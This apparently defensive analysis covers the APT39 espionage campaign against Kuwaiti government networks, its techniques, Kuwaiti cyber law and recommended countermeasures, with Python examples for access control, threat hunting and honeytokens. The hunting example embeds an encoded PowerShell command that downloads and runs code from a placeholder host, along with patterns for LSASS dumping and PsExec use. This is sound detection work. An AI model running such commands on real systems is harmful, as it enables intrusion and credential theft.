Between 2018 and 2020, the Iranian state-sponsored threat actor known as APT39 - also tracked as Chafer or Remix Kitten by different threat intelligence providers - conducted a sustained, multi-year cyber espionage campaign against Kuwaiti government agencies, targeting diplomatic communications, military intelligence, and sensitive oil sector operational data.
Bitdefender Labs published a detailed technical analysis of the campaign, documenting the custom toolsets and living-off-the-land techniques employed by the group to maintain persistent, stealthy access to high-value Kuwaiti government networks over an extended period.
Key Facts
- What: Iranian APT39 conducted multi-year cyber espionage against Kuwait (2018-2020).
- Who: Kuwaiti government diplomatic, military, and oil sector agencies.
- Data Exposed: Diplomatic cables, military intelligence, and oil sector operational data.
- Outcome: Two-year undetected dwell time; discovered by Bitdefender, not Kuwait.
What Was Exposed
- Diplomatic communications from Kuwaiti government agencies, potentially including negotiating positions, foreign policy assessments, and classified diplomatic cables
- Military intelligence data, potentially including operational planning documents, order of battle information, and assessments of regional military capabilities
- Kuwait Petroleum Corporation and oil sector operational data, including production figures, infrastructure assessments, and commercial negotiations
- Personnel records of government officials, military officers, and intelligence personnel, enabling targeting for future social engineering or physical surveillance
- Internal government network architecture and authentication credential stores, providing persistent access paths and enabling future re-entry
- Communications metadata revealing the organisational structure of targeted agencies, the identity of key officials, and the patterns of inter-agency communication
- Classified assessments of Kuwait’s relationships with coalition partners, potentially including information on intelligence sharing arrangements
- Data on Kuwait’s US military basing arrangements and the operational details of coalition force presence at Kuwaiti bases
APT39 is assessed by multiple intelligence agencies and private threat intelligence firms to operate as an extension of Iranian state intelligence, specifically the Ministry of Intelligence and Security (MOIS). The group’s primary mission is the collection of intelligence in support of Iranian geopolitical objectives - tracking dissidents and opposition figures, gathering intelligence on regional adversaries, and monitoring the activities of foreign governments whose decisions affect Iranian interests.
Kuwait sits at the intersection of several Iranian intelligence priorities: it hosts significant US military infrastructure (Ali Al Salem Air Base and Camp Arifjan), maintains close relationships with Saudi Arabia that create strategic intelligence value, and has historically served as a mediator in regional disputes where Iranian interests are at stake.
The technical profile of APT39’s operations, as documented in Bitdefender’s analysis and in MITRE ATT&CK’s APT39 profile, is characterized by a preference for custom-developed tools over commodity malware. Public reporting on the group describes a set of custom backdoors: SEAWEED (file upload/download, command execution, and screenshot capture), CACHEMONEY (a second custom backdoor), and a group-specific variant of POWBAT (a PowerShell-based backdoor providing remote command execution). Persistence for these implants relies on ordinary Windows mechanisms such as registry Run keys and scheduled tasks rather than on any exploit, which is exactly why it blends in with legitimate software.
These custom tools enable APT39 to evade signature-based detection tools that rely on known malware hashes, requiring behavioral detection capabilities that were not universally deployed across Kuwait’s government network at the time of the campaign.
Living-off-the-land (LotL) techniques were central to APT39’s operational security during the Kuwait campaign. By leveraging legitimate Microsoft administrative tooling - PowerShell, Windows Management Instrumentation, Remote Desktop Protocol, and the Sysinternals suite - for lateral movement, credential harvesting, and data collection, the group minimized the artifacts that would distinguish its activity from routine administration. This approach is particularly effective in government environments where system administrators routinely use the same tools for legitimate purposes: the defender cannot alert on the tool itself and must instead alert on context - which account ran it, from which host, against which target, at what time, and whether that combination has ever been seen before - which makes behavioral detection significantly more challenging than in environments where these tools are rarely or never legitimately used.
The dwell time of the APT39 campaign in Kuwait - at least two years - is a critical indicator of the detection failure that enabled the damage. Extended dwell times are characteristic of state-sponsored espionage operations precisely because they prioritize intelligence collection over operational disruption. Unlike ransomware operators who must eventually reveal their presence to collect payment, espionage actors benefit from remaining undetected indefinitely, continuously exfiltrating intelligence while avoiding any action that might trigger an incident response investigation.
Two years of undetected access to Kuwaiti government networks represents an intelligence windfall for Iranian state interests, potentially enabling them to anticipate Kuwaiti diplomatic positions, understand Kuwaiti military capabilities, and track Kuwaiti intelligence relationships with coalition partners.
The geopolitical context of 2018-2020 makes the intelligence value of this campaign particularly significant.
This period encompassed the escalating tensions following the US withdrawal from the Joint Comprehensive Plan of Action (JCPOA) in May 2018, the subsequent maximum-pressure sanctions campaign, the Gulf crisis that began in June 2017 and saw Qatar blockaded by Saudi Arabia, the UAE, Bahrain, and Egypt, and the US strike that killed IRGC Quds Force Commander Qasem Soleimani in January 2020. Kuwait’s role as a mediator during the Qatar crisis, combined with its hosting of US military forces and its close relationship with Saudi Arabia, made its government communications extraordinarily valuable to Iranian intelligence analysts trying to understand the evolving Gulf political landscape.
The oil sector targeting in the APT39 campaign reflects a consistent priority across multiple Iranian state-sponsored cyber operations. Kuwait’s oil sector - centered on the Kuwait Petroleum Corporation (KPC), one of the world’s largest vertically integrated oil companies - holds commercial intelligence of enormous value to Iranian oil ministry officials seeking to understand competitor production strategies, pricing positions, and OPEC quota compliance.
Exfiltrating KPC operational data provides Iran with intelligence that is directly valuable both for energy policy purposes and as a source of commercial advantage in international oil markets where Kuwait and Iran compete for customers and market share.
Regulatory Analysis
The APT39 campaign against Kuwait’s government agencies presents a fundamentally different regulatory challenge from the commercial ransomware incidents that represent most of Kuwait’s publicized data breach history. Nation-state espionage operations do not fit neatly within the data protection regulatory framework established by CITRA’s DPPR Decision No. 26/2024 or the Cybercrime Law No. 63/2015. Nevertheless, the regulatory analysis reveals important structural insights about Kuwait’s cyber governance framework.
The Cybercrime Law No. 63/2015 clearly criminalizes the unauthorized access and data interception that constitute APT39’s core activities. Articles establishing offenses for unauthorized system access, data interception, and electronic surveillance apply directly to the technical actions performed by APT39 operators within Kuwaiti government networks.
However, the practical enforcement of these provisions against state-sponsored actors operating from Iranian territory is constrained by the absence of mutual legal assistance arrangements and the diplomatic impossibility of extradition for individuals acting under the direction of a foreign state intelligence service.
The DPPR Decision No. 26/2024’s breach notification requirements create obligations for compromised Kuwaiti government agencies irrespective of the state-sponsored nature of the attacker. Where government agencies process personal data of Kuwaiti citizens - and the diplomatic and military agencies targeted by APT39 certainly do - a compromise that provides unauthorized access to that data constitutes a personal data breach requiring notification to CITRA within 72 hours of discovery. Two caveats apply. First, the Decision post-dates the 2018-2020 campaign, so the obligation described here governs a comparable compromise discovered today rather than the original intrusion retrospectively. Second, the national security sensitivity of the specific data exposed may justify limitations on the public elements of the notification, but it does not eliminate the obligation to notify the regulator.
Kuwait’s regulatory framework lacks a dedicated national security cyber incident reporting mechanism comparable to the federal incident reporting requirements in the United States under Executive Order 14028 or the UK government’s reporting arrangements coordinated by the National Cyber Security Centre.
The absence of such a mechanism means that there is no regulatory basis for compelling government agencies to report state-sponsored intrusions to a central coordinating authority, limiting the government’s ability to develop a comprehensive picture of Iranian APT activity across Kuwait’s government network and to coordinate defensive responses.
The two-year dwell time of the APT39 campaign raises questions about the adequacy of the security measures in place at the targeted Kuwaiti government agencies. CITRA’s DPPR and the broader data protection framework impose obligations on data controllers to implement appropriate technical and organizational measures to protect personal data.
For government agencies handling classified diplomatic and military data, the standard of appropriate measures must be calibrated to the threat landscape - which includes state-sponsored espionage as a foreseeable and documented risk. Security measures that fail to detect a sophisticated intrusion for two years do not meet any reasonable definition of appropriate for data of this sensitivity.
What Should Have Been Done
Defending against a sophisticated, patient state-sponsored espionage actor like APT39 requires a fundamentally different security philosophy than defending against opportunistic criminal ransomware operators. The working assumption must be that the adversary is already inside the network and has been for an extended period. The defensive objective is therefore not only to prevent initial access but, above all, to minimize the attacker’s ability to collect and exfiltrate valuable intelligence once inside, while maximizing the defender’s ability to detect the intrusion and identify the full scope of compromise.
Data minimization and compartmentalization are the most effective strategic defenses against sustained espionage. Kuwait’s government agencies should implement strict need-to-know access controls that limit each user’s ability to access sensitive data to only what is directly required for their current official function. Classification systems should enforce technical access controls, not merely advisory labels, ensuring that accessing above-classification data requires explicit authorization that is logged and monitored in real time.
An espionage actor who gains initial access through a low-privilege employee account should be immediately confined to a limited data universe by technical access controls, rather than being able to escalate privileges and access the full range of sensitive government data.
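The confinement described above is only real if the classification label is checked by code on every read and every decision is logged. The following is an added example written for this page (not code from Bitdefender's report or from any Kuwaiti government system) of a mandatory need-to-know check: a reader must both hold a clearance that dominates the document level and hold every compartment the document requires, and read-up attempts are recorded as hunting leads. The classification levels, compartment tags, accounts and documents are constructed for the example.

```python
"""Added example: need-to-know as a technical control with real-time auditing.
Illustrative code written for this page, not from Bitdefender's report or any
Kuwaiti government system. Levels, compartments, accounts and documents are
constructed for the example."""
from dataclasses import dataclass, field
from typing import Dict, FrozenSet, List

# Assumption: a linear classification hierarchy; a higher number dominates a lower one.
LEVELS = {"UNCLASSIFIED": 0, "RESTRICTED": 1, "CONFIDENTIAL": 2, "SECRET": 3}


@dataclass(frozen=True)
class Subject:
    name: str
    clearance: str
    compartments: FrozenSet[str]   # need-to-know tags the account holds


@dataclass(frozen=True)
class Document:
    doc_id: str
    level: str
    compartments: FrozenSet[str]   # tags a reader must hold


@dataclass
class AuditLog:
    """Every decision is recorded; denials feed the SOC's real-time monitoring."""
    entries: List[Dict[str, str]] = field(default_factory=list)

    def record(self, subject: Subject, doc: Document, decision: str, reason: str) -> None:
        self.entries.append({"subject": subject.name, "doc": doc.doc_id,
                             "decision": decision, "reason": reason})

    def read_up_attempts(self) -> List[Dict[str, str]]:
        # An account probing above its clearance is a hunting lead, not noise.
        return [e for e in self.entries if e["reason"].startswith("read-up")]


def authorize_read(subject: Subject, doc: Document, log: AuditLog) -> bool:
    """Mandatory check: clearance must dominate the document level AND the
    subject must hold every compartment the document requires (no read-up,
    no reading outside one's need-to-know). The label is enforced, not advisory."""
    if LEVELS[subject.clearance] < LEVELS[doc.level]:
        log.record(subject, doc, "DENY", "read-up: clearance below document level")
        return False
    missing = doc.compartments - subject.compartments
    if missing:
        log.record(subject, doc, "DENY", "need-to-know: missing " + ",".join(sorted(missing)))
        return False
    log.record(subject, doc, "ALLOW", "clearance and compartments satisfied")
    return True


def reachable(subject: Subject, documents: List[Document], log: AuditLog) -> List[str]:
    """The data universe one account exposes if its credentials are stolen."""
    return [d.doc_id for d in documents if authorize_read(subject, d, log)]


# Constructed sample data.
DOCUMENTS = [
    Document("cable-2019-117", "SECRET", frozenset({"DIPLO"})),
    Document("kpc-q3-production", "CONFIDENTIAL", frozenset({"OIL"})),
    Document("staff-directory", "RESTRICTED", frozenset()),
]
CLERK = Subject("clerk01", "RESTRICTED", frozenset())            # low-privilege phished account
ANALYST = Subject("analyst07", "SECRET", frozenset({"DIPLO"}))   # cleared, but only for DIPLO


def demo() -> Dict[str, object]:
    """Show what each account can reach and how many read-up probes were logged."""
    log = AuditLog()
    clerk_view = reachable(CLERK, DOCUMENTS, log)
    analyst_view = reachable(ANALYST, DOCUMENTS, log)
    return {"clerk": clerk_view, "analyst": analyst_view,
            "read_up_attempts": len(log.read_up_attempts()), "log": log.entries}


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The point of `reachable` is that it answers the incident-response question directly: a stolen `clerk01` credential exposes one document, not the whole estate, and the two denied read-up attempts it generates are exactly the signal a monitored classification system gives the SOC while the actor is still probing.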
Threat hunting, rather than reactive incident response, is the appropriate detection strategy for nation-state espionage. Threat hunters proactively search network and endpoint telemetry for indicators of compromise (IOCs) and behavioral patterns associated with known adversary TTPs, rather than waiting for security tools to generate alerts on detected threats. APT39’s TTPs are extensively documented in MITRE ATT&CK and in Bitdefender’s published analysis; Kuwait’s government agencies should have been conducting regular threat hunts using APT39’s known indicators and behavioral signatures.
A structured threat hunting programme, conducted monthly or more frequently for high-risk agencies, would significantly reduce the probability of a two-year undetected dwell time.
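The LotL discussion earlier on this page and the threat-hunting recommendation above call for the same thing: hunting logic that keys on context rather than on tool hashes. The following is an added example written for this page (not detection content from Bitdefender or MITRE) of a small ATT&CK-mapped hunt over process-creation telemetry. It decodes PowerShell `-EncodedCommand` payloads, flags WMI- and Office-spawned shells, PsExec-style service execution and LSASS dumping, and adds a baseline rule that fires when admin tooling is run by an account outside the known admin set. Hostnames, accounts, the admin-account baseline and the events themselves are constructed; field names mimic Windows 4688 / Sysmon Event ID 1.

```python
"""Added example: an ATT&CK-mapped hunt over constructed process-creation
telemetry. Example code for this page, not Bitdefender's or MITRE's detection
content. Technique IDs are MITRE ATT&CK identifiers; BASELINE is a local rule."""
import base64
import re
from collections import Counter
from typing import Callable, Dict, List, Tuple

# Assumptions: accounts that legitimately run admin tooling, and what counts as tooling.
ADMIN_ACCOUNTS = {"KW\\it-admin1", "KW\\svc-sccm"}
ADMIN_TOOLS = {"psexec.exe", "psexesvc.exe", "wmic.exe", "procdump.exe", "procdump64.exe", "ntdsutil.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
OFFICE = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_powershell(cmdline: str) -> str:
    """Recover the script hidden behind -EncodedCommand (base64 of UTF-16LE)."""
    m = ENC_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def r_powershell(img, parent, cmd, e):
    text = (cmd + " " + decode_powershell(cmd)).lower()
    return img == "powershell.exe" and any(k in text for k in (
        "downloadstring", "iex ", "invoke-expression", "-w hidden", "-windowstyle hidden"))


def r_office(img, parent, cmd, e):
    return parent in OFFICE and img in SHELLS


def r_wmi(img, parent, cmd, e):
    return parent == "wmiprvse.exe" and img in SHELLS


def r_psexec(img, parent, cmd, e):
    return img == "psexesvc.exe" or (parent == "services.exe" and "\\admin$\\" in cmd.lower())


def r_lsass(img, parent, cmd, e):
    return "procdump" in img and "lsass" in cmd.lower()


def r_baseline(img, parent, cmd, e):
    return img in ADMIN_TOOLS and e["user"] not in ADMIN_ACCOUNTS


RULES: List[Tuple[str, str, Callable]] = [
    ("T1059.001", "PowerShell hidden/encoded download cradle", r_powershell),
    ("T1204.002", "Office application spawned a shell", r_office),
    ("T1047", "WMI provider host spawned a shell", r_wmi),
    ("T1569.002", "PsExec-style service execution", r_psexec),
    ("T1003.001", "LSASS memory dump via procdump", r_lsass),
    ("BASELINE", "Admin tooling run by a non-admin account", r_baseline),
]


def hunt(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Run every rule over every event; one finding per (event, rule) match."""
    findings = []
    for e in events:
        img, parent = _basename(e["image"]), _basename(e["parent"])
        for tid, name, pred in RULES:
            if pred(img, parent, e["cmdline"], e):
                findings.append({"technique": tid, "rule": name, "host": e["host"],
                                 "user": e["user"], "image": img,
                                 "decoded": decode_powershell(e["cmdline"])})
    return findings


def summarize(findings: List[Dict[str, str]]) -> Dict[str, int]:
    """Findings per host: the hosts with the most hits are where to pivot first."""
    return dict(Counter(f["host"] for f in findings))


# Constructed telemetry. The encoded command is built here so the decoder can be seen working.
_ENC = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a')".encode("utf-16le")).decode()
_PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
EVENTS = [
    {"host": "KW-FS01", "user": "KW\\it-admin1", "parent": "C:\\Windows\\explorer.exe", "image": _PS,
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},                       # benign admin use
    {"host": "KW-WS042", "user": "KW\\jdoe", "parent": "C:\\Program Files\\Microsoft Office\\WINWORD.EXE",
     "image": _PS, "cmdline": f"powershell.exe -nop -w hidden -enc {_ENC}"},           # document lure
    {"host": "KW-DC01", "user": "KW\\jdoe", "parent": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
     "image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "cmd.exe /c whoami"},        # remote WMI exec
    {"host": "KW-FS01", "user": "KW\\jdoe", "parent": "C:\\Windows\\System32\\services.exe",
     "image": "C:\\Windows\\PSEXESVC.exe", "cmdline": "C:\\Windows\\PSEXESVC.exe"},     # PsExec service
    {"host": "KW-DC01", "user": "KW\\svc-sccm", "parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Tools\\procdump64.exe", "cmdline": "procdump64.exe -ma lsass.exe C:\\temp\\l.dmp"},
    {"host": "KW-DC01", "user": "KW\\it-admin1", "parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\wbem\\wmic.exe", "cmdline": "wmic /node:KW-WS042 os get caption"},
]

if __name__ == "__main__":
    for f in hunt(EVENTS):
        print(f["technique"], f["host"], f["user"], f["rule"], f["decoded"][:40])
    print(summarize(hunt(EVENTS)))
```

Note what the baseline rule does and does not catch: `wmic` run by `it-admin1` produces nothing, because the account is in the admin set, while `procdump` against LSASS fires regardless of who runs it. In a real hunt the admin set would be learned from the directory and the preceding weeks of telemetry rather than hard-coded, and the per-host summary is what you would pivot on to scope the compromise.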
Deception technology - honeypots, honeytokens, and canary credentials - represents a particularly effective tool against espionage actors who must access data to achieve their mission. Deploying realistic fake credentials, documents, and network services that appear to be high-value intelligence targets will attract an actor like APT39 that is actively seeking to identify and access sensitive data.
Any interaction with deception assets generates an immediate, high-confidence alert that a sophisticated actor is present in the network, enabling rapid incident response before the actor has accessed genuine sensitive data. Deception technology is particularly effective against LotL attackers who appear to be legitimate users - the deception environment distinguishes between the system administrator who legitimately accesses a file server and the espionage actor who accesses a fake file server that no legitimate user should ever touch.
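The following is an added example written for this page (not code from the original report) of the tripwire described above: canary accounts that exist in the directory but hold no rights and have no legitimate user, a decoy file that leaks one of them, and a decoy share whose name matches what the adversary is looking for. Any logon attempt with a canary credential, successful or not, and any read under the decoy share raises a critical alert, while an administrator's ordinary activity raises nothing. Canary names, the decoy share path and the event records are constructed; event fields mimic Windows Security log events 4624, 4625 and 4663.

```python
"""Added example: canary credentials and honeytoken files as a tripwire for an
actor hunting for sensitive data. Illustrative code for this page, not from the
original report. Canaries, decoy paths and events are constructed."""
import secrets
from collections import defaultdict
from typing import Dict, List, Optional

# Constructed canaries: accounts with no rights and no legitimate user, and a
# decoy share that no real workflow ever opens. Names are chosen to look like
# exactly what an espionage actor is searching for.
CANARY_ACCOUNTS = {"kw\\oilexport-ro", "kw\\backup-svc2"}
HONEY_PATHS = ["\\\\kw-fs01\\archive\\coalition-basing\\"]


def new_canary_account(domain: str, prefix: str = "svc") -> str:
    """Mint a plausible-looking service account name to plant in a decoy file."""
    return f"{domain}\\{prefix}-{secrets.token_hex(3)}".lower()


def decoy_file_contents(account: str) -> str:
    """A 'forgotten' credentials note. The password is fake; the account is a canary."""
    return f"# legacy backup job\nuser={account}\npass=Winter2019!\n"


def _norm(account: str) -> str:
    return account.strip().lower()


def check_event(e: Dict[str, object]) -> Optional[Dict[str, object]]:
    """Return an alert if the event touches a canary, else None. Any use of a
    canary credential (even a failed logon) or any read of the decoy share is
    high-confidence: nothing legitimate references them."""
    eid = e["event_id"]
    if eid in (4624, 4625) and _norm(e["account"]) in CANARY_ACCOUNTS:
        return {"severity": "critical", "reason": "canary credential used",
                "account": _norm(e["account"]), "source": e["source"], "logon_ok": eid == 4624}
    if eid == 4663 and any(str(e["object"]).lower().startswith(p) for p in HONEY_PATHS):
        return {"severity": "critical", "reason": "honeytoken file accessed",
                "account": _norm(e["account"]), "source": e["source"], "object": e["object"]}
    return None


def monitor(events: List[Dict[str, object]]) -> List[Dict[str, object]]:
    return [a for a in map(check_event, events) if a]


def implicated_hosts(alerts: List[Dict[str, object]]) -> Dict[str, List[str]]:
    """Group alerts by source host; the first host to trip a canary is where
    incident response starts."""
    by_host = defaultdict(list)
    for a in alerts:
        by_host[a["source"]].append(a["reason"])
    return dict(by_host)


# Constructed event stream: two benign admin events, then three canary touches.
EVENTS = [
    {"event_id": 4624, "account": "KW\\it-admin1", "source": "KW-ADM01", "object": None},
    {"event_id": 4663, "account": "KW\\it-admin1", "source": "KW-ADM01",
     "object": "\\\\KW-FS01\\Finance\\q3.xlsx"},
    {"event_id": 4625, "account": "KW\\oilexport-ro", "source": "KW-WS042", "object": None},
    {"event_id": 4663, "account": "KW\\jdoe", "source": "KW-WS042",
     "object": "\\\\KW-FS01\\Archive\\Coalition-Basing\\basing-plan.docx"},
    {"event_id": 4624, "account": "kw\\OILEXPORT-RO", "source": "KW-DC01", "object": None},
]

if __name__ == "__main__":
    print(decoy_file_contents("kw\\oilexport-ro"))
    for alert in monitor(EVENTS):
        print(alert)
    print(implicated_hosts(monitor(EVENTS)))
```

Two design points matter here. The failed logon (4625) with the canary still alerts, because the value of the canary is that the attacker read the decoy file at all, not that the password worked. And the account comparison is case-normalized, since the same credential will show up in different forms depending on which tool the actor used to replay it.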
Kuwait should establish a national threat intelligence sharing mechanism that enables government agencies to share IOCs and adversary TTPs among themselves, without requiring public disclosure that could compromise ongoing investigations or reveal classified capabilities. The discovery of APT39 activity in Kuwaiti government networks by a private sector cybersecurity firm, rather than by Kuwait’s own intelligence and cybersecurity apparatus, suggests that the government’s threat intelligence collection and sharing mechanisms were not functioning effectively.
A national cyber intelligence fusion center, operating under CITRA or the national security apparatus, would provide the coordination mechanism needed to ensure that indicators discovered in one government agency are immediately shared across all agencies as defensive signatures.
Diplomatic and intelligence liaison relationships with Gulf Cooperation Council partners, the United States, and the United Kingdom provide access to classified threat intelligence about Iranian APT operations that is not available through commercial channels. Kuwait should leverage these relationships to ensure that its government cybersecurity teams have access to the full classified picture of APT39’s capabilities and TTPs, enabling proactive defensive measures before publicly disclosed IOCs have been incorporated into commercial threat intelligence feeds.
The US Cyber Command and CISA regularly share classified threat intelligence with allied government CERT teams; Kuwait should formalize these information-sharing arrangements to ensure that CERT-KW operates with the most current and complete intelligence picture available.
Two years of undetected Iranian espionage inside Kuwait’s government networks is not primarily a technology failure - it is a strategic failure to invest in the threat hunting, intelligence sharing, and detection capabilities proportionate to Kuwait’s geopolitical exposure as a Gulf state hosting US military forces and serving as a regional diplomatic mediator. The intelligence already lost cannot be recovered; the priority is ensuring that future Iranian APT activity is detected in days, not years.